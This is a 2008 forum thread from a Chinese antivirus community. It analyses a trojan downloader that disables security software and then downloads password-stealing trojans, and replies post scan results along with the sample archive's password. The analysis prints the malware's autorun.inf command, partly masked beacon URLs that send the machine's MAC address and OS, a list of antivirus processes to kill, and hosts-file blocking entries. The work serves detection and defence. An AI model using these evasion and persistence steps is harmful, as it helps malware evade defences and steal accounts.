查看: 6090|回复: 16
收起左侧

[病毒样本] 12.11终结者定时器--对抗型木马(Win32.TrojDownloader.Agent.ns.41984)附样本

[复制链接]
youba
发表于 2008-12-22 15:41:52 | 显示全部楼层 |阅读模式
终结者定时器41984”(Win32.TrojDownloader.Agent.ns.41984),这是一个对抗型的木马下载器。它是近来流行的“超级AV终结者”的一个变种,该系列下载器结合了AV终结者、机器狗、autorun病毒的特点,对网吧、企业等局域网用户和个人用户的影响都很大。


  该下载器基本功能与不久前出现的“超级AV终结者”原始版本相同,都是利用各种对抗手段破坏用户电脑的安全防御、在电脑中驻扎,然后下载大量的盗号木马。

  这个变种具有时效性,毒霸反病毒工程师检查后发现,病毒作者为其设定的有效期为2008-12-30,如果病毒发现系统时间已经是2009年,就会自动关闭。不过,这并不表示该毒在2009年就不会有威胁,因为病毒作者可以发送远程指令,随时为该毒升级。

  该毒在穿透SSDT表后就关闭系统中的的安全软件,并将它们的进程映像劫持,令它们瘫痪。同时禁止用户访问任何与电脑安全有关的网页和使用系统自带的全部安全工具。

  当以上工作全部完成,该毒就连接到病毒作者指定的地址,下载大量的盗号木马,下载量较之前的版本来说,更加庞大。

一、文件分析
1)母体dll
导出函数explore
获取ShellExecuteA,并调用”exploreropen.”打开当前目录。用于每个驱动器下打开目录。
导出函数SchedServiceMain、ServiceMain、SvchostEntry_W32Time
a)检测调试器:查找进程OllyICE.exe,OllyDbg.exe,ImportREC.exe,C32Asm.exe,LordPE.exe,PEditor.exe等进程,如果存在则退出,不存在则调用IsDebuggerPresent,检测当前是否被调试,是的话退出。
b)创建NSDownLoader26AVip20081207互斥体,并判断是否存在,存在退出。
c)通过ring3下关卡巴进程。
d)释放资源102到%sys32dir%\Nskhelper2.sys,并创建服务NsRk1,启动,来恢复SSDT。
e)扫描当前系统进程列表,发现有安全软件进程,就调用驱动中的ZwTerminateProcess将它关闭。
进程列表
pccguide.exeZONEALARM.exezonealarm.exewink.exe
windows优化大师.exeWFINDV32.exewebtrap.exeWEBSCANX.exe
WEBSCAN.exevsstat.exeVSSCAN40VSHWIN32.exevshwin32.exe
VSECOMR.exeVPC32.exevir.exeVETTRAY.exeVET95.exe
vavrunr.exeUlibCfg.exeTSC.exetmupdito.exetmproxy.exe
TMOAgent.exeTmntsrv.exeTDS2-NT.exeTDS2-98.exeTCA.exe
TBSCAN.exesymproxysvc.exeSWEEP95.exespy.exe
SPHINX.exesmtpsvc.exeSMC.exesirc32.exeSERV95.exe
secu.exeSCRSCAN.exescon.exeSCANPM.exeSCAN32.exescan.exe
scam32.exesafeweb.exesafeboxTray.exern.exeRfw.exe
rescue32.exeregedit.exeRavTask.exeRavStub.exe
RavMonD.exeRavMon.exerav7win.exeRAV7.exeras.exe
pview95.exeprot.exeprogram.exePpPpWallRun.exe
pop3trap.exePERSFW.exePCFWALLICON.exepccwin98.exe
pccmain.exepcciomon.exePCCClient.exepcc.exePAVCL.exe
PADMIN.exeOUTPOST.exeoffice.exeNVC95.exeNUPGRADE.exe
norton.exeNORMIST.exeNMAIN.exenisum.exenisserv.exe
NAVWNT.exenavwnt.exeNAVW32.exeNAVW.exeNAVSCHED.exenavrunr.exeNAVNT.exeNAVLU32.exenavapw32.exenavapsvc.exe
N32ACAN.exems.exeMPFTRAY.exeMOOLIVE.exemoniker.exe
mon.exemicrosoft.exemcafee.exeLUCOMSERVER.exeluall.exe
LOOKOUT.exelockdown2000.exelamapp.exekwatch.exe
KVPreScan.exeKVMonXP.exeKRF.exeKPPMain.exekpfwsvc.exe
kpfw32.exeKPFW32.exekissvc.exekavstart.exekav32.exe
Kasmain.exeKabackreport.exeJED.exeiomon98.exeiom.exe
ICSSUPPNT.exeICMOON.exeICLOADNT.exeICLOAD95.exe
IceSword.exeice.exeIBMAVSP.exeIBMASN.exeIAMSERV.exe
IAMAPP.exeF-STOPW.exef-stopw.exeFRW.exeFP-WIN.exefp-win.exe
f-prot95.exeF-PROT.exefir.exeFINDVIRU.exeF-AGNT95.exe
explorewclass.exeESPWATCH.exeESAFE.exeEFINET32.exeECENGINE.exe
DVP95.exeDV95_O.exeDV95.exedebu.exedbg.exeDAVPFW.exe
CLEANER3.exeCLEANER.exeCLAW95CT.exeCLAW95.execfinet32.exe
cfinet.exeCFIND.exeCFIAUDIT.exeCFIADMIN.exeCCenter.exe
BLACKICE.exeBLACKD.exeavxonsol.exeAVWIN95.exeavsynmgr.exe
AVSCHED32.exeAVPUPD.exeAVPTC32.exeAVPNT.exeAVPMON.exeAVPM.exeavpdos32.exeAVPCC.exeavp32.exeavp.exeAVKSERV.exeavk.exeAVGCTRL.exeAVE32.exeAVCONSOL.exeAUTODOWN.exeATRACK.exeatrack.exeAPVXDWIN.exeantivir.exeANTI-TROJAN.exeanti.exe
ACKWIN32.exe360tray.exe360safe.exe_AVPM.exe_AVPCC.exe
_AVP32.exe
f)映像劫持以上进程,并指svchost.exe.
g)获取当前机子的MAC地址和操作系统版本及运行时间,向指定网址发信。
http://chike01.3**2.org/3/Count.asp?mac=00-00-00-00-00-00&os=WinXP&ver=2...
h)解密网址http://www-1***3.com/count.txthttp://chike01.3**2.org/3.txt,下载里面的病毒到%temp%目录,并依次运行。
i)遍历驱动器,在非a:\和b:\驱动器根目录下创建autorun.inf,先判断autorun.inf是否已存在文件或文件夹,存在先删除,在创建,并将自身复制过去命名为system.dll,autorun.inf中调用system.dll的导出函数explore.
[autorun]
shell\open\command=rundll32system.dll,explore
shell\explore\command=rundll32system.dll,explore
j)释放资源105到%sys32dir%\appwinproc.dll,将其远程线程注入到explorer.exe进程中。
k)修改hosts文件,屏蔽安全软件网址。
127.0.0.1www.360.cn
127.0.0.1www.360safe.cn
127.0.0.1www.360safe.com
127.0.0.1www.chinakv.com
127.0.0.1www.rising.com.cn
127.0.0.1rising.com.cn
127.0.0.1dl.jiangmin.com
127.0.0.1jiangmin.com
127.0.0.1www.jiangmin.com
127.0.0.1www.duba.net
127.0.0.1www.eset.com.cn
127.0.0.1www.nod32.com
127.0.0.1shadu.duba.net
127.0.0.1union.kingsoft.com
127.0.0.1www.kaspersky.com.cn
127.0.0.1kaspersky.com.cn
127.0.0.1virustotal.com
127.0.0.1www.kaspersky.com
127.0.0.1www.cnnod32.cn
127.0.0.1www.lanniao.org
127.0.0.1www.nod32club.com
127.0.0.1www.dswlab.com
127.0.0.1bbs.sucop.com
127.0.0.1www.virustotal.com
127.0.0.1tool.ikaka.com
127.0.0.1360.qihoo.com
j)将系统服务lanmanserver和Browser设置为手动,并将其开启。
k)释放资源103到%sys32dir%下命名为NsPass?.sys(?为0、1、2依次类推),并创建对应的服务NsPsDk??(??为00、01、02),并启动,直接访问磁盘并将自己写入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驱动创建个数与上面文件写入有关,若正常写入驱动将为5个与其对应,某个dll没有正常写入,下次重启会多加一个驱动。
导出函数DllEntryPoint
a)判断当前是否注入svchost.exe,且时间是否在2008-12-30以前,是的话跳入主功能线程,否则不注入。同导出函数SchedServiceMain、ServiceMain、SvchostEntry_W32Time。
b)若不是,释放资源102回复ssdt,关闭杀软进程,然后ring3关卡巴,自己创建一个svchost.exe进程,将自身创建远程线程注入。
2)释放的资源102sys(Nskhelper2.sys)
恢复SSDT,并结束指定进程。
3)释放的资源103sys(NsPass?.sys)
直接访问磁盘并将自己写入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驱动创建个数与上面文件写入有关,若正常写入驱动将为5个与其对应,某个dll没有正常写入,下次重启会多加一个驱动。
4)释放的资源104dll(appwinproc.dll)
a)HookWM_MOVE,当有程序调用时,该dll被载入。
b)获取窗口,当发现有金山毒霸,360安全卫士,江民,木马,专杀,下载者,NOD32,卡巴斯基字样的窗口,则调TerminateProcess将其关闭。



超级AV终结者样本见http://bbs.kafan.cn/thread-382652-1-1.html

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
su-tt
发表于 2008-12-22 15:50:52 | 显示全部楼层
解压密码呢?
youba
 楼主| 发表于 2008-12-22 15:51:37 | 显示全部楼层
密码:123
su-tt
发表于 2008-12-22 15:54:09 | 显示全部楼层
ESS解压后剩下HBCHIBI.dll    HBQQSG.dll    System.exe上报ESET
saga3721
发表于 2008-12-22 15:59:05 | 显示全部楼层
红伞微点一阵报警弹框之后剩下这两样东西还有一只空文件夹

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
挪威的冬天
发表于 2008-12-22 16:33:45 | 显示全部楼层
除了 autorun.inf

信息        2008-12-22  16:32:29        您此次查毒共查出27个病毒以及危险代码                       
信息        2008-12-22  16:32:29        您此次查毒共查了内存模块0个,磁盘引导扇区0个,文件29个                       
信息        2008-12-22  16:32:29        金山毒霸主程序查毒过程结束,查毒方式:命令行查毒                       


金山毒霸可信认证查询结果如下:

报告生成于:   2008/12/22 16:32

autorun.inf      --------      可疑的


appwinproc.dll      --------      病毒
kodens.dll      --------      病毒
NsPass1.sys      --------      病毒
NsPass2.sys      --------      病毒
NsPass3.sys      --------      病毒
NsPass4.sys      --------      病毒
qanhllao.dll      --------      病毒
xsisco.dll      --------      病毒
xsiscok.exe      --------      病毒
HBASKTAO.dll      --------      病毒
HBDNF.dll      --------      病毒
HBJTLQ.dll      --------      病毒
HBmhly.dll      --------      病毒
HBQQSG.dll      --------      病毒
HBQQXX.dll      --------      病毒
HBSHQ.dll      --------      病毒
HBTL.dll      --------      病毒
HBWD.dll      --------      病毒
HBYY.dll      --------      病毒
HBZHUXIAN.dll      --------      病毒
system.dll      --------      病毒


jolinen.dll      --------      分析中
kandoftt.dll      --------      分析中
Nskhelper2.sys      --------      分析中
HBCHIBI.dll      --------      分析中
HBWOW.dll      --------      分析中
System.exe      --------      分析中


理论文件总数:        28
实际文件总数:        28

其中:

分析中: 6
可疑的: 1
病毒: 21

识别率为: 100%
sam.to
发表于 2008-12-22 16:41:07 | 显示全部楼层
22/12/2008 16:39:34        已偵測: Trojan.Win32.Hooker.ah        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\appwinproc.dll               
22/12/2008 16:39:34        已偵測: Worm.Win32.AutoRun.ubh        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\autorun.inf               
22/12/2008 16:39:35        已偵測: Backdoor.Win32.Agent.vfd        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\system.dll               
22/12/2008 16:40:21        已偵測: Trojan.Win32.Obfuscated.wir        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\kodens.dll               
22/12/2008 16:40:22        已偵測: Trojan-GameThief.Win32.OnLineGames.tzbg        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\kandoftt.dll               
22/12/2008 16:40:22        已偵測: Trojan-GameThief.Win32.OnLineGames.twkj        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\jolinen.dll               
22/12/2008 16:40:24        已偵測: Rootkit.Win32.Agent.fhv        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\Nskhelper2.sys               
22/12/2008 16:40:25        已偵測: Rootkit.Win32.Small.hp        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\NsPass1.sys               
22/12/2008 16:40:25        已偵測: Rootkit.Win32.Small.hq        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\NsPass2.sys               
22/12/2008 16:40:26        已偵測: Rootkit.Win32.Small.hr        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\NsPass3.sys               
22/12/2008 16:40:26        已偵測: Rootkit.Win32.Small.hs        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\NsPass4.sys               
22/12/2008 16:40:27        已偵測: Trojan-GameThief.Win32.OnLineGames.twbq        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\xsisco.dll               
22/12/2008 16:40:27        已偵測: Trojan-GameThief.Win32.OnLineGames.txsi        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\qanhllao.dll               
22/12/2008 16:40:27        已偵測: Trojan-GameThief.Win32.OnLineGames.twsw        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\1\xsiscok.exe               
22/12/2008 16:40:29        已偵測: Backdoor.Win32.Agent.uyi        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBASKTAO.dll               
22/12/2008 16:40:30        已偵測: Trojan.Win32.SmallGame.bb        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBCHIBI.dll               
22/12/2008 16:40:30        已偵測: Trojan-GameThief.Win32.OnLineGames.tvez        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBDNF.dll               
22/12/2008 16:40:31        已偵測: Trojan.Win32.Agent.annv        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBJTLQ.dll               
22/12/2008 16:40:32        已偵測: Trojan-GameThief.Win32.OnLineGames.tvrn        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBmhly.dll               
22/12/2008 16:40:33        已偵測: Trojan-GameThief.Win32.OnLineGames.txqn        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBQQSG.dll               
22/12/2008 16:40:33        已偵測: Trojan-Spy.Win32.Small.byw        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBQQXX.dll               
22/12/2008 16:40:34        已偵測: Trojan-GameThief.Win32.OnLineGames.tvbf        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBSHQ.dll               
22/12/2008 16:40:35        已偵測: Trojan-GameThief.Win32.OnLineGames.ttlp        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBTL.dll               
22/12/2008 16:40:35        已偵測: Trojan.Win32.Agent.aouf        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBWD.dll               
22/12/2008 16:40:36        已刪除: Trojan.Win32.Agent.aouf        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBWD.dll               
22/12/2008 16:40:36        已偵測: Trojan-GameThief.Win32.WOW.dil        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBWOW.dll               
22/12/2008 16:40:36        已偵測: Trojan.Win32.Agent.arkc        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBYY.dll               
22/12/2008 16:40:38        已偵測: Trojan.Win32.SmallGame.av        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\HBZHUXIAN.dll               
22/12/2008 16:40:38        已偵測: Trojan-GameThief.Win32.MultiFirst.ac        C:\Documents and Settings\kato9096\桌面\终结者定时器41984\C盘\exam\System.exe               


沒有不报.
BING126
头像被屏蔽
发表于 2008-12-22 20:20:35 | 显示全部楼层
McAfee 全灭。。

appwinproc.dll    generic.dx                 
autorun.inf           generic!atr               
hbasktao.dll         pws-onlinegames.o         
hbchibi.dll            pws-onlinegames.co        
hbdnf.dll              pws-onlinegames.co      
hbjtlq.dll             pws-onlinegames.co        
hbmhly.dll            pws-mmorpg.gen            
hbqqsg.dll           pws-onlinegames.co        
hbqqxx.dll            pws-onlinegames.co         
hbshq.dll             generic pws.y             
hbtl.dll                 pws-onlinegames.co          
hbwd.dll               pws-mmorpg.gen            
hbwow.dll            pws-onlinegames.co         
hbyy.dll               pws-onlinegames.co         
hbzhuxian.dll       pws-onlinegames.co        
jolinen.dll             pws-gamania.gen.dll      
kandoftt.dll          pws-gamania.gen.dll        
kodens.dll           pws-gamania.gen.dll        
nskhelper2.sys     generic downloader.x      
nspass1.sys         generic downloader.x        
nspass2.sys         generic downloader.x      
nspass3.sys         generic downloader.x      
nspass4.sys         generic downloader.x      
qanhllao.dll         generic pws.al            
system.dll          generic backdoor          
system.exe         generic.dx                
xsisco.dll            pws-gamania.gen.dll       
xsiscok.exe         pws-gamania.gen.dll
ldy144028
头像被屏蔽
发表于 2008-12-23 08:47:29 | 显示全部楼层
瑞星怎么不杀呢
啊弥陀佛
发表于 2008-12-23 09:15:50 | 显示全部楼层
木马名称:Trojan-PSW.Win32.OnLineGames.czov
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\终结者定时器41984\C盘\EXAM\HBSHQ.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?


木马名称:Trojan.Win32.Agent.yuj
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\终结者定时器41984\C盘\EXAM\HBWD.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?


木马名称:Trojan.Win32.Agent.ysj
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\终结者定时器41984\C盘\EXAM\HBJTLQ.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?

木马名称:Trojan.Win32.Agent.ysg
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\终结者定时器41984\C盘\EXAM\HBYY.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-23 23:07 , Processed in 0.137319 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表